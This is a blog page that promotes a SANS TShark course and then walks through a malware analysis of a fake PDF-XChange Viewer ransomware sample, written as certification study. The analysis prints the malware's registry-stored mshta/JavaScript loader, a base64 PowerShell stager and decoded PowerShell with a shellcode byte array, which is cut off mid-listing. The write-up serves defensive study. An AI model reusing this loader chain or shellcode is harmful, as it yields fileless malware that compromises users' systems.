Monday, January 11, 2021

SANS Stay Sharp series - Improve your Mastery of TShark Packet Analysis with SANS SEC582

  SANS Stay Sharp series

Come hangout with me at one of the upcoming SANS SEC582.

Here are some feedback from the students:
-   Great content and information. The real world challenges made the difference in the course
-   self explanatory
-   Excellent
-   its good as command line kung fu but missing the traditional SAN's style of covering the basic.
-   Lots a great content. Perhaps needs, the knowledge of packets from 503 day 1 as a precursor.
-   The content is awesome
-   The content is well-developed and I am learning some new tricks with T-Shark. Good stuff.
-   The content is right on point and practical all the way.

 Come join us to ensure you stay sharp with TShark.

 Remember, once you attend the class live or live online, you get a free copy of Hack and Detect (https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458) OR Mastering TShark Network Forensics (https://www.amazon.com/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024).

 

Looking forwarding to seeing you soon.

#SANS #SEC582 #SEC503

Malware Analysis - Learning about PDF-XChange Viewer Ramsomware

This post and all others for this month are part of the series which I used to help me prepare for my GIAC Reverse Engineer Malware (GREM) certification.

The name PDF-XChange Viewer was learned via static analysis with Resource Hacker. Here is what the Version Info shows.

1 VERSIONINFO
FILEVERSION 2,5,314,0
PRODUCTVERSION 2,5,0,0
FILEOS 0x40004
FILETYPE 0x2
{
BLOCK "StringFileInfo"
{
	BLOCK "041504E2"
	{
		VALUE "CompanyName", "Tracker Software Products (Canada) Ltd."
		VALUE "FileVersion", "2.5.0314.0000"
		VALUE "LegalCopyright", "Copyright (C) 2001-2015 by Tracker Software Products (Canada) Ltd."
		VALUE "LegalTrademarks", "Tracker Software Products (Canada) Ltd."
		VALUE "ProductVersion", "2.5"
		VALUE "SpecialBuild", ""
		VALUE "PrivateBuild", ""
		VALUE "ProductName", "PDF-XChange Viewer"
		VALUE "Comments", "PDF-XChange Viewer"
		VALUE "FileDescription", "PDF-XChange Viewer"
		VALUE "InternalName", "PDF-XChange Viewer"
		VALUE "OriginalFilename", "PDFXCview.exe"
	}
}

BLOCK "VarFileInfo"
{
	VALUE "Translation", 0x0415 0x04E2  
}
}


Looking at some of the artifacts created via ProcDot, we see the PDFXCView.exe process created a regsvr32.exe process. This regsvr32.exe then spawned another regsvr32.exe. This second regsvr32.exe seems to be responsible for the network communication, as it had 17 different IPs, which it attempted to communicate with. Here is the first 8 of those IPs. 


At this point, we could check our logs to see if any of these IP addresses show up as a possible indicator of compromise (IoC). I recommend you look as far back as your logs allow and if possible as far forward as you can. Obviously, It also interacted heavily with the registry creating multiple keys, values and adding data. For us, we will start with the key ekce and its values. 


We can further confirm these IoCs exist by looking at the registry from a snapshot perspective.

C:\Users\SecurityNik> reg query HKCU\Software\EKCE

HKEY_CURRENT_USER\Software\EKCE
    bnjfoe    REG_SZ    IS*Œõ;¢´÷ªÙk®#°*R¼˜pM®9ê£ö4ŒßÁÓÏ·(ê5Ðñ]¶
¶%&´^÷pA¬å4ñªy‰Ïòƒ®ßt2&¤UêmµuE•¢f-¨²Ó¯Vˆ/ŒÁ%ÜIšttÑaùZ†—¡óÖ££6¬‡“(¥X‰nµÐÄ_¾ômþWtÝtbäü®7óÇ€ú`Ç÷6¦øWXst¦@Û8@žg]¹h4s¦ÔTm˜»òÙ{Vðœ€D@ÀñÏ%Û—¹Èß7@ª©ËGç»ÛO‡Èl›lovË.‚`(S[¢ƒÂQ¡Áa²
    plfi    REG_SZ    NPrroM5ZysxcLiKdpLy="B3E3mloEQ5uU3w0Z8h";vrZlTAZwOKvfQEfE0cJrFoOF="YiKC3bjjjJDFWXEEDg0PC3FrDN8pH3TIK";FFLwfclpPFBQD6UoVA="BJ0L2xhvpOcszH0IWILEwHTSQFlKvVxuRn2siTsbLoobEML";
.......
cDmpN1XoNa3BU4WhsAOGfdprm1q";PrCPNgXpjPvBfSpeFw5jxK="CYME5CVTpkG5w8tWogmKv";
    glrdixnng    REG_SZ    c24QjMM5VPvyv82p/aEZBKOJdPFdX5HDM8pLFrGfh896eGOHr5ccZ/3ZTiEZknaG5AtOm7vEgowXZ6HmFWHfnkHgjnV6ij80S5JJV39UWvVf0J5mIn8NiUatc3ge8fnkFgHCd4LKkVKgyPjAlg+xrnb+9l9QrfaPiwibloMsXDQLv1YNwbEa7t69c2xlDQ0ugVys7/aw94Msj0goX3c=
    gafd    REG_SZ    dzoW2sc/WBxJFA==
    hpcf    REG_SZ    eGsRipdqURkmT5D/HLuGur9p+ejPfpk=
    cqtr    REG_SZ    eGwQ2sU6UznMUT6H0D8tbIw=

Funny enough above we see PDFXCView also interacted with HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ which is used for persistence. The image above suggests the file 1065d.bat which is shown below was set as a value. However, looking at that key in the registry, there seems to be no evidence that this value exists.

C:\Users\SecurityNik> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\SecurityNik\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    (Default)    REG_SZ    (value not set)

Worse yet, when I looked at this from the perspective of regedit.exe, I got the error below.


Leveraging autorunsc and writing it's output to a file, we then search for 1065d[.]bat and found four hits.

C:\Users\SecurityNik>autorunsc -nobanner -a *  > auturuns.txt
C:\Users\SecurityNik>type auturuns.txt | findstr /i "1065d.bat"
     "C:\Users\SecurityNik\AppData\Local\2e957\1065d.bat"
     c:\users\securitynik\appdata\local\2e957\1065d.bat
     "C:\Users\SecurityNik\AppData\Local\2e957\1065d.bat"
     c:\users\securitynik\appdata\local\2e957\1065d.bat

Interesting, Autorunsc shows the Default key actually has data that points to our suspicious file. 

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
   OneDrive
     "C:\Users\SecurityNik\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
     Microsoft OneDrive
     Microsoft Corporation
     20.169.823.6
     c:\users\securitynik\appdata\local\microsoft\onedrive\onedrive.exe
     3/17/2012 12:37 PM
   (Default)
     "C:\Users\SecurityNik\AppData\Local\2e957\1065d.bat"
     c:\users\securitynik\appdata\local\2e957\1065d.bat
     12/15/2020 10:15 AM

Additionally, if you look above, you see two files have been created in the C:\Users\SecurityNik\AppData\Local\2e957\ directory as show below.

C:\Users\SecurityNik>dir C:\Users\SecurityNik\AppData\Local\2e957\
 Volume in drive C has no label.
 Volume Serial Number is 6C10-15EA

 Directory of C:\Users\SecurityNik\AppData\Local\2e957

12/15/2020  10:15 AM    <DIR>          .
12/15/2020  10:15 AM    <DIR>          ..
12/15/2020  10:15 AM                68 1065d.bat
12/15/2020  10:15 AM            16,335 67dd8.f5298e
               2 File(s)         16,403 bytes
               2 Dir(s)  37,282,160,640 bytes free

Looking into the .bat file, we see what looks like an attempt to start the second file in the folder.

C:\Users\SecurityNik>type AppData\Local\2e957\1065d.bat
start "MtyUdsl9htzewASTiSAqN5" "%LOCALAPPDATA%\2e957\67dd8.f5298e"

For the second file, we did not get much. 

C:\Users\SecurityNik>type AppData\Local\2e957\67dd8.f5298e
Ä»^╪2≥QR╩L*sÄ3═üïsÑ50ß⌐Lp┐>%≡■^í│wO

Running strings also did not return much. Looking at the file from the perspective of a hex editor, did not make things easier either.


This regsrv32.exe also then created a third regsvr32.exe with one thread. 

Continuing to focus on the additional registry created under:

HKCU\Software\Classes\.f5298e\
HKCU\Software\ekce\

Starting with HKCU\Software\Classes\, Microsoft states "The subkeys and registry values associated with the HKEY_LOCAL_MACHINE\SOFTWARE\Classes key contain information about an application that is needed to support COM functionality."

If we look closely above, the registry key has a value of  .f5298e looking closer at the file name above which the .bat file is starting, we see it ends with the same .f5298e extension. Looking at any values associated with this registry key we see ada3d which suggests the application needed to open this application can be found at HKCU\Software\Classes\ada3d.

C:\Users\SecurityNik>reg query HKCU\Software\Classes\.f5298e
HKEY_CURRENT_USER\Software\Classes\.f5298e
    (Default)    REG_SZ    ada3d

Slight detour and for context. 

If we look at the .html extension on my VM, we see FirefoxHTML seems to be the application that is needed to open HTML files.

C:\Users\SecurityNik>reg query HKCU\Software\Classes\.html
HKEY_CURRENT_USER\Software\Classes\.html
    (Default)    REG_SZ    FirefoxHTML

Looking at the HKCU\Software\Classes\FirefoxHTML we see how HTML applications are opened.

C:\Users\SecurityNik>reg query HKCU\Software\Classes\FirefoxHTML

HKEY_CURRENT_USER\Software\Classes\FirefoxHTML
    (Default)    REG_SZ    Firefox HTML Document
    FriendlyTypeName    REG_SZ    Firefox HTML Document
    EditFlags    REG_DWORD    0x2

HKEY_CURRENT_USER\Software\Classes\FirefoxHTML\DefaultIcon
HKEY_CURRENT_USER\Software\Classes\FirefoxHTML\shell


Getting back on track.

Now that we know we should look to HKCU\Software\Classes\ada3d for information on how the extension should be handled, let's do that. First up, it looks like we need to go a couple of levels down to get to the data of interest.

C:\Users\SecurityNik>reg query HKCU\Software\Classes\ada3d
HKEY_CURRENT_USER\Software\Classes\ada3d\shell

C:\Users\SecurityNik>reg query HKCU\Software\Classes\ada3d\shell
HKEY_CURRENT_USER\Software\Classes\ada3d\shell\open

C:\Users\SecurityNik>reg query HKCU\Software\Classes\ada3d\shell\open
HKEY_CURRENT_USER\Software\Classes\ada3d\shell\open\command

After digging, we see the mshta.exe launched what seems to be some Javascript which is attempting to execute WScript.Shell to read the contents in HKCU\Software\ekce\plfi which is one of he entries we learned about above.

C:\Users\SecurityNik>reg query HKCU\Software\Classes\ada3d\shell\open\command
HKEY_CURRENT_USER\Software\Classes\ada3d\shell\open\command
    (Default)    REG_SZ    "C:\Windows\system32\mshta.exe" "javascript:AbkY6N="3Kf";x7K=new ActiveXObject("WScript.Shell");VqmR6="NECv";H2Oin=x7K.RegRead("HKCU\\software\\ekce\\plfi");UY8RKFuW="jhsi";eval(H2Oin);DKqf1D="Z";"

Here is a clearer view from JSBeautifier.

AbkY6N = "3Kf";
x7K = new ActiveXObject("WScript.Shell");
VqmR6 = "NECv";
H2Oin = x7K.RegRead("HKCU\\software\\ekce\\plfi");
UY8RKFuW = "jhsi";
eval(H2Oin);
DKqf1D = "Z";

Exporting the contents of the registry key, 

C:\Users\SecurityNik>reg export HKCU\software\ekce plfi.txt
The operation completed successfully.

After cleaning up the contents of the file I then run it through Spider Monkey

remnux@remnux:/tmp$ js -f /usr/share/remnux/objects.js -f plfi.js > plfi.js.output

After running through SpiderMonkey, we now have some contents which makes sense at the beginning and some more than makes sense at the end. However, in the middle we have lots of what seems like nonsense. :-)

eNGi6Q4XNXtAFlwfXARQZOEL="nql8mNW1a1UmaBwrCuMfP6YjDPsY3Gn";f3ZASgdXhdtqDojQ0AkPb="fdX0aI0SmrtMn2zK9r";FqXe6cLyeADEEStyryEvK="IudXFkk4EVPblmOYkfhnm2sQ2TO";sSiisGwbayaiTIYmKqqZ8D="FZOB3uHZzMlwUDkS9";rhKHPnauZICdTSZ9NBaA="x6nrUpsNijADFNfErU3yesEW";try{moveTo(-100,-100);resizeTo(0,0);q7N=new ActiveXObject("WScript.Shell");(q7N.Environment("Process"))("cuez")="iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('I3d1a2JwendqZHZlc3ptaXVqZW9mZw0Kc2xlZXAoMTUpO3RyeXsNCiNtcHhyZA0KZnVuY3Rpb24gZ2RlbGVnYXRlew0KI2d2Y2MNClBhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1R5cGVbXV0gJFBhcmFtZXRlcnMsW1BhcmFtZXRlcihQb3NpdGlvbj0xKV0gW1R5cGVdICRSZXR1cm5UeXBlPVtWb2lkXSk7DQojc2h0bnZ4eGJmDQokVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1 
..............
gQChbSW50UHRyXSxbVUludDMyXSxbVUludDMyXSxbVUludDMyXSxbVUludDMyXSxbSW50UHRyXSkgKFtJbnRQdHJdKSkpKS5JbnZva2UoMCwwLCRwciwkcHIsMCwwKTsNCiN3cHpvbWVjDQp9c2xlZXAoMTIwMCk7fWNhdGNoe31leGl0Ow0KI2R3a2p0dHV1ZQ0KI3lzaXVheWl2dWENCg==')))";g4wAd3=q7N.Run("C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe iex $env:cuez",0,1);}catch(e){}close();
// close()

Above we see FromBase64String, suggesting the content is base64 encoded. Taking advantage of CyberChef to decode (make sense of what I previously called nonsense) this content, we see below in yellow what suggests we are dealing with PowerShell.

#wukbpzwjdveszmiujeofg
sleep(15);try{
#mpxrd
function gdelegate{
#gvcc
Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);
#shtnvxxbf
$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule",$false).DefineType("XXX","Class,Public,Sealed,AnsiClass,AutoClass",[System.MulticastDelegate]);
#qchm
$TypeBuilder.DefineConstructor("RTSpecialName,HideBySig,Public",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags("Runtime,Managed");
#zzeiqapejn
$TypeBuilder.DefineMethod("Invoke","Public,HideBySig,NewSlot,Virtual",$ReturnType,$Parameters).SetImplementationFlags("Runtime,Managed");
#lskfqqq
return $TypeBuilder.CreateType();}
#cvhi
function gproc{
#tezffvn
Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);
#icaibabqun
$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split("\")[-1].Equals("System.dll")};
#faymzrobss
$UnsafeNativeMethods=$SystemAssembly.GetType("Microsoft.Win32.UnsafeNativeMethods");
#rvbu
return $UnsafeNativeMethods.GetMethod("GetProcAddress").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod("GetModuleHandle").Invoke($null,@($Module)))),$Procedure));}
#bujmhw
[Byte[]] $sc32 = 0x55,0x8B,0xEC,0x81,0xC4,0x00,0xFA,<#eg#>0xFF,0xFF,0x53,0x56,0x57,0x53,0x56,0x57,0xFC,0x31,0xD2,0x64,0x8B,0x52,0x30,0x8B,0x52,0x0C,0x8B,0x52,0x14,0x8B,0x72,0x28,<#ndl#>0x6A,0x18,0x59,0x31,0xFF,<#xo#>0x31,0xC0,0xAC,<#ifd#>0x3C,0x61,0x7C,0x02,0x2C,0x20,0xC1,0xCF,0x0D,0x01,0xC7,0xE2,0xF0,0x81,0xFF,0x5B,0xBC,0x4A,<#qu#>0x6A,0x8B,0x5A,0x10,0x8B,0x12,0x75,0xDB,0x89,0x5D,<#vkc#>0xFC,0x5F,0x5E,0x5B,0x8B,0x45,0xFC,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,0x85,0x0F,0x02,0x00,0x00,0x8B,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0x45,0xD4,0x8B,<#ulq#>0x40,0x3C,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,<#lt#>0x83,0xC4,0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0xE5,0x01,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x40,0x78,0x03,0x45,0xFC,0x89,0x45,0xCC,0x8B,<#da#>0x45,0xCC,0x8B,0x40,0x18,0x85,0xC0,0x0F,0x8C,0xCB,0x01,0x00,0x00,0x40,0x89,0x85,0x3C,0xFF,<#zq#>0xFF,0xFF,<#kbv#>0x33,0xF6,0x8B,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0x45,0xCC,0x8B,0x40,0x20,0x33,0xD2,0x52,0x50,0x8B,<#cvq#>0xC6,0xC1,0xE0,0x02,0x99,0x03,0x04,0x24,<#fys#>0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x8B,0x08,0x03,0x4D,0xFC,0x81,0x39,0x4C,0x6F,0x61,0x64,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x4C,0x69,0x62,0x72,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,<#ya#>0x61,0x72,0x79,0x41,0x75,0x40,0x8D,0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,<#sl#>0x45,0xFC,0x33,0xD2,<#gj#>0x52,0x50,0x8B,0xC6,0x03,0xC0,<#anh#>0x99,0x03,0x04,0x24,0x13,<#dz#>0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,<#jtt#>0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xBC,0x81,0x39,0x47,0x65,0x74,<#aaw#>0x50,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x72,0x6F,0x63,0x41,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,0x64,0x64,0x72,0x65,0x75,0x40,0x8D,0x41,0x0E,0x80,0x38,0x00,0x75,<#jdj#>0x38,0x8B,0x45,0xCC,<#dtd#>0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,<#kb#>0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,<#jta#>0x52,<#phr#>0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xB8,0x81,<#ros#>0x39,0x56,0x69,0x72,0x74,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x75,0x61,0x6C,0x41,0x75,0x4B,0x8D,0x41,<#gr#>0x08,<#zb#>0x81,0x38,0x6C,0x6C,0x6F,0x63,0x75,0x40,0x8D,0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,<#gtc#>0xCC,0x8B,<#ua#>0x40,<#me#>0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,<#ew#>0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,<#it#>0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,<#br#>0xA8,<#no#>0x81,0x39,0x45,0x78,0x69,0x74,<#rpm#>0x75,0x63,0x8D,0x41,0x04,0x81,0x38,0x50,<#vwd#>0x72,0x6F,0x63,0x75,0x58,0x8D,<#nik#>0x41,0x08,0x80,0x38,0x65,0x75,0x50,0x8D,0x41,0x09,0x80,0x38,0x73,0x75,0x48,0x8D,0x41,0x0A,0x80,0x38,0x73,0x75,0x40,0x83,0xC1,0x0B,0x80,0x39,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,<#gt#>0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,<#hx#>0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,<#wac#>0x8B,0x52,0x1C,<#yhq#>0x03,0x55,0xFC,0x0F,0xB7,<#ub#>0xC0,0xC1,0xE0,0x02,0x03,<#xvx#>0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xA4,0x46,0xFF,0x8D,<#xi#>0x3C,0xFF,0xFF,0xFF,0x0F,0x85,0x3E,0xFE,<#jgv#>0xFF,0xFF,0xC6,0x85,0x2F,0xFF,0xFF,0xFF,0x61,0xC6,0x85,0x30,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x31,0xFF,0xFF,0xFF,0x76,0xC6,0x85,0x32,0xFF,0xFF,<#few#>0xFF,0x61,0xC6,0x85,0x33,0xFF,0xFF,0xFF,0x70,0xC6,<#pqm#>0x85,0x34,0xFF,0xFF,0xFF,0x69,0xC6,0x85,0x35,0xFF,0xFF,0xFF,0x33,0xC6,<#ow#>0x85,<#he#>0x36,0xFF,0xFF,0xFF,0x32,0xC6,0x85,0x37,0xFF,0xFF,0xFF,0x2E,0xC6,0x85,0x38,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x39,0xFF,<#vi#>0xFF,0xFF,0x6C,0xC6,0x85,0x3A,0xFF,0xFF,0xFF,0x6C,0xC6,0x85,0x3B,0xFF,<#bwf#>0xFF,0xFF,0x00,0x8D,0x85,<#hca#>0x2F,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xBC,0x8B,0xD8,0x85,0xDB,0x75,0x05,0x6A,0x00,0xFF,<#cz#>0x55,0xA4,0x89,0x5D,0xD4,0x8B,0x45,0xD4,0x66,<#gb#>0x81,0x38,0x4D,0x5A,0x0F,0x85,0x4F,<#gk#>0x01,0x00,0x00,0x8B,0xC3,0x33,0xD2,0x52,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,<#vrg#>0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0x26,0x01,0x00,<#ff#>0x00,0x8B,0x45,0xD0,0x8B,0x40,0x78,0x03,0xC3,0x89,0x45,0xCC,0x8B,0x45,0xCC,<#yr#>0x8B,0x40,0x18,0x85,0xC0,0x0F,0x8C,0x0D,0x01,0x00,0x00,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,<#cbm#>0x8B,0xC3,0x33,<#pdr#>0xD2,<#xuj#>0x52,0x50,<#ect#>0x8B,0x45,0xCC,<#esg#>0x8B,0x40,0x20,0x33,0xD2,0x52,0x50,0x8B,0xC6,0xC1,0xE0,0x02,0x99,0x03,<#mw#>0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,<#llc#>0xC4,<#gc#>0x08,0x8B,0x08,0x03,0xCB,0x81,<#ca#>0x39,0x52,0x65,0x67,0x4F,0x75,0x5B,0x8D,0x41,0x04,0x81,0x38,0x70,0x65,0x6E,0x4B,0x75,0x50,0x8D,0x41,0x08,0x81,0x38,0x65,0x79,0x45,0x78,0x75,0x45,0x8D,0x41,0x0C,0x80,0x38,<#bn#>0x41,0x75,0x3D,0x8D,0x41,0x0D,0x80,0x38,0x00,0x75,<#xy#>0x35,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,<#oa#>0xC3,0x33,0xD2,<#vg#>0x52,0x50,0x8B,0xC6,<#da#>0x03,0xC0,0x99,<#ht#>0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,<#aae#>0x8B,0x52,0x1C,0x03,<#gt#>0xD3,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0xC3,0x89,0x45,0xB0,0x81,0x39,0x52,0x65,0x67,0x51,0x75,0x5E,<#pp#>0x8D,0x41,0x04,0x81,0x38,0x75,0x65,0x72,0x79,<#yht#>0x75,0x53,0x8D,0x41,0x08,0x81,0x38,0x56,0x61,0x6C,0x75,0x75,0x48,0x8D,0x41,0x0C,0x81,<#vq#>0x38,0x65,0x45,0x78,0x41,<#vh#>0x75,0x3D,0x83,0xC1,0x10,0x80,0x39,0x00,0x75,0x35,0x8B,0x45,0xCC,0x8B,0x40,<#ys#>0x24,0x03,0xC3,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,<#sw#>0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0xD3,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,<#smh#>0x02,0x03,0xC3,0x89,0x45,<#hj#>0xAC,0x46,0xFF,0x8D,<#dyn#>0x3C,0xFF,0xFF,0xFF,0x0F,0x85,0xFC,0xFE,0xFF,0xFF,0x8B,<#fq#>0x45,0x08,0x05,0x48,0x0A,0x00,<#lz#>0x00,0x89,0x85,0x7C,<#mfp#>0xFF,0xFF,0xFF,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x05,0xE4,0x00,0x00,0x00,0x89,0x85,0x78,0xFF,0xFF,0xFF,0x33,0xDB,0x33,0xC0,0x89,<#nhq#>0x85,0x64,<#zmn#>0xFF,0xFF,0xFF,0x33,0xC0,0x89,0x85,0x60,0xFF,0xFF,0xFF,0x8D,0x85,0x70,0xFF,0xFF,0xFF,0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x50,<#con#>0x68,0x02,0x00,0x00,0x80,<#mla#>0xFF,0x55,0xB0,0x85,0xC0,0x0F,0x85,0x86,0x00,0x00,0x00,<#efd#>0x8D,<#sry#>0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8D,0x85,0x6C,<#ay#>0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,<#vgq#>0x85,0x7C,0xFF,<#fam#>0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,<#uwj#>0xFF,0x55,0xAC,0x85,0xC0,0x75,0x5C,0x83,0xBD,0x60,0xFF,0xFF,0xFF,0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,<#goi#>0x60,<#isp#>0xFF,0xFF,0xFF,<#ahc#>0x50,0x6A,<#gpr#>0x00,0xFF,0x55,<#uzi#>0xA8,0x89,0x85,0x64,0xFF,0xFF,0xFF,0x83,<#tc#>0xBD,0x64,<#ucu#>0xFF,0xFF,0xFF,0x00,0x74,0x31,0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x02,0xB3,0x01,0x33,0xC0,0x89,0x85,<#rwz#>0x70,0xFF,0xFF,0xFF,0x84,0xDB,0x0F,0x85,0xB8,0x00,<#ut#>0x00,0x00,0x33,0xC0,0x89,0x85,<#ona#>0x64,0xFF,0xFF,0xFF,0x33,0xC0,0x89,<#btw#>0x85,<#yzx#>0x60,0xFF,0xFF,0xFF,0x8D,<#yco#>0x85,0x70,0xFF,0xFF,0xFF,0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x50,0x68,0x01,0x00,0x00,0x80,0xFF,0x55,0xB0,<#fi#>0x85,0xC0,<#mfr#>0x0F,0x85,0x86,0x00,0x00,0x00,0x8D,0x85,0x60,0xFF,0xFF,0xFF,<#or#>0x50,0x6A,0x00,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,<#by#>0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x5C,0x83,0xBD,0x60,0xFF,0xFF,0xFF,0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,0xA8,0x89,0x85,<#jo#>0x64,0xFF,0xFF,0xFF,0x83,0xBD,0x64,0xFF,0xFF,0xFF,0x00,<#cf#>0x74,0x31,0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,<#rqy#>0xFF,0xFF,0x50,0x8D,0x85,0x6C,<#em#>0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,<#ut#>0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x02,0xB3,0x01,0x84,0xDB,0x75,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x80,0xDC,<#hjy#>0x00,0x00,0x00,0x50,0x8B,0x85,0x7C,<#nwm#>0xFF,0xFF,0xFF,0x83,0xC0,0x52,0x50,0x8D,0x85,<#bmw#>0x00,0xFA,0xFF,0xFF,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x33,0xF6,0x8D,0x8D,0x00,0xFB,0xFF,0xFF,0x89,0x31,0x46,<#jd#>0x83,<#pq#>0xC1,0x04,0x81,0xFE,0x00,0x01,0x00,0x00,0x75,0xF2,0x33,0xDB,0x33,0xF6,0x8D,0x8D,0x00,0xFB,0xFF,0xFF,0x03,0x19,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0xFF,0xB0,0xDC,0x00,0x00,0x00,0x8B,0